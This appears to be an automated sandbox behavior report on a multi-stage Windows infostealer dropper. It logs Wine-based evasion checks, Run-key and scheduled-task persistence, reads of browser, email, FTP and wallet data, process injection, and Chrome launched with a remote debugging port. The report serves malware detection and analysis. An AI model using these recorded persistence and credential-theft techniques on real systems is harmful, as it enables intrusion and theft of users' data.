N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036420101\b59e2e872a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036430101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10036390101\95fec32fd0.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10036400101\08a8bb090e.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\ProgramData\eltqgcf\oamb.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10036420101\b59e2e872a.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9e28748818.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10035810101\\9e28748818.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10035820121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036400101\08a8bb090e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\eltqgcf\oamb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036430101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempNIKU2KFNSI0OSCJ5SNYFIAJYHYQOJDXS.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036420101\b59e2e872a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10035810101\9e28748818.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036390101\95fec32fd0.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133850860752177191" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035810101\9e28748818.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2068 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe
PID 1668 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe
PID 3204 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1668 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe
PID 2068 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe
PID 5004 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 2432 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 1004 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 208 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 64 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff95bb7cc40,0x7ff95bb7cc4c,0x7ff95bb7cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2016,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2012 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1944,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2136 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1984,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2464 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3192,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3200 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3328,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3236 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

